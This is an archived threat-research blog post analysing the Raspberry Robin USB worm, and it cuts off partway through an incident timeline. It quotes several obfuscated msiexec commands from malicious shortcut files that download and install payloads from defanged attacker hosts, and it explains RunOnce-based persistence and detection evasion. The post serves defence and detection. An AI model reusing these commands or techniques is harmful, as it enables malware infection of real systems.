Evolution of USB-Borne Malware, Raspberry Robin By Harlan Carvey Published: 2023-09-07 · Archived: 2026-04-10 03:00:51 UTC Due to our extensive and diverse customer base, Huntress “sees” a good bit of the same malicious activity others are seeing, albeit often from a slightly different perspective.  One example of this is, not long ago, Huntress analysts investigated an INC ransom group incident, one that at the time had only been recently observed by others. In other cases, Huntress analysts may observe elements of attacks or campaigns that are slightly different from what other, similar firms may experience. Since July 2022, Huntress has observed the USB device-borne Raspberry Robin malware across our customer base off and on. In that time, we’ve seen different variations, as well as an evolution of the response to the malware. While there has been no regular cadence of infections, it’s clear that a combination of human-managed EDR and human-managed antivirus provides a great deal of detection and response capabilities in the face of such infections. What Is Raspberry Robin? Raspberry Robin is malware that has been described as a “USB worm”, as USB devices are the primary delivery mechanism that has been observed to this point. Users interact with a file on a USB device, and then their system becomes infected with the Raspberry Robin malware.  Raspberry Robin has been seen to be part of a much larger malware ecosystem and acts as a possible precursor to additional ransomware deployment. However, unlike other worms out there, this malware has not been observed propagating to other endpoints on its own. https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin Page 1 of 4 Raspberry Robin Infection Chain The typical Raspberry Robin infection chain follows what has previously been shared; the user connects the infected USB device and double-clicks the Windows shortcut/LNK file, causing an apparent “junk” file containing an MSIExec command to be launched.  Huntress analysts have observed several variations of commands embedded within Windows shortcut/LNK files, including: tYPeWycz.Cfg|CMDcMd FUBb=jxbCAQtnu"msIeXeC YliNpQ=YgYdWQ /q VZFfOPaC=gwiIp jE=jnlD -fV "hTtP://FxB[.]tw:8080/AMBG/9FlMJgrIkRjJfVw2bWSju/Machine=User"MsIEXEc HbeLpYii=TPvbe WyWsZiUBG=mpV /I "hTTP://eJK[.]bz:8080/BC/A3Y7fxb0oDMXkstfQGYd/Machine?User" -qUIeT ZS=xKG Kvbzhtp=UpyZqTff vQtPdg=mWbmSIExeC zkrZ=CtX /qN wZd=VgaoYGD /PACKAgE "HtTP://jRx[.]fR:8080/yKyC/bSis/yUp0OSNBN0eTTIjpK/Machine=User" dJYsmgC=pBVHKGG ieJ=SIYm Pm=cdFDvckTmSiexeC \tBIQGitHuP=OsdHlvG\tjYRdyzQwc=Hwr\t/fV\t\"hTTp://ZjC[.]bz:8080/AoA3LSHNJCaFIM/hMgkh/62oyni/ EnksxM=KdVZ vTECB=bHLmevjk -QUIET\tWx=iY LdP=VEfGlpn\tMcxWT=zTtlOkU Finally, persistence is established by creating a value beneath the user’s RunOnce Registry key. As Microsoft stated: Entries in the RunOnce key delete the registry entry prior to launching the executable content at sign-in. Raspberry Robin re-adds this key once it is successfully running to ensure persistence. After the initial infection, this leads to RunOnce.exe launching the malware payload in timelines. Raspberry Robin also temporarily renames the RunOnce key when writing to it to evade detections. As a result, the malware persists by recreating a value beneath the user’s RunOnce Registry key each time the value is removed from the key and executed. Hunting for Raspberry Robin https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin Page 2 of 4 During August 2023, Huntress analysts observed a Raspberry Robin infection attempt—one that failed to complete. Notification of the infection attempt was observed via detections based on Huntress EDR telemetry and Managed Microsoft Defender alerts. The following table illustrates a timeline excerpt of the events as the infection attempt unfolded: 12:20:32Z User connects “USB Disk 3.0” device “USB\VID_13FE&PID_6300\070393698CF56A96” to the endpoint; a lookup identifies this device as a Phison Electronics Corp device, SN: 070393698CF56A96 12:21:12Z User double-clicks “USB DISK.lnk”, launches “cmd /C!coMSPEc!